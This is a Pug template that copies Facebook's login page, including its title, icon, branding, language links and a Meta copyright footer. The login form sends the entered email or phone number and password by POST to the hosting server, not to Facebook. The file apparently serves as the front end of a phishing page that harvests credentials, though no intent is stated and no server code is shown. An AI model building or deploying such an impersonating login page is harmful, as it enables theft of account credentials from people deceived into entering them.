doctype html
head
  meta(charset='UTF-8')
  meta(http-equiv='X-UA-Compatible', content='IE=edge')
  meta(name='viewport', content='width=device-width, initial-scale=1.0')
  link(rel='shortcut icon', href='../static/facebook-round-color-icon.png', type='image/x-icon')
  title facebook
  link(rel='stylesheet', href='../static/index.css')
.mainContainer
  //- .navAndro
  //-   .phone
  //-     img(src="", alt="phone")
  //-   .android
  //-     strong Get Facebook for Android and browse faster.
  .container1
    .facebook
      h1 facebook
    .bio
      h2 Connect with friends and the world around you on Facebook.
  .container2
    .mainBox
      .filUp
        form(action="/" method='POST')
          input#username(type='text', name='username', placeholder='Email or phone number')
          input#password(type='password', name='password', placeholder='Password')
          button(type='submit') Log In
        .forgot
          a Forgot password?
        .divider 
          .line1
          .text 
            .strong or 
          .line2 
      .btn
        a(href='#') Create new account
    .finalMsg
      a(href='#') Create a Page
      strong  for a celebrity, brand or business.
    .forMob
      .mainCon1 
        .con1
          strong English US 
          a(href="#") हिन्दी
          a(href="#") Português Brasil
          a(href="#") Deutsch
        .con2
          a(href="") नेपाली
          a(href="") Español
          a(href="") Français France
          a(href="") 
            img(src="../static/plus-sign-icon.png")
      .con3
        .part1
          a(href="#") About.
          a(href="#") Help. 
          a(href="#") More
        .part2
          strong Meta &copy 2022
        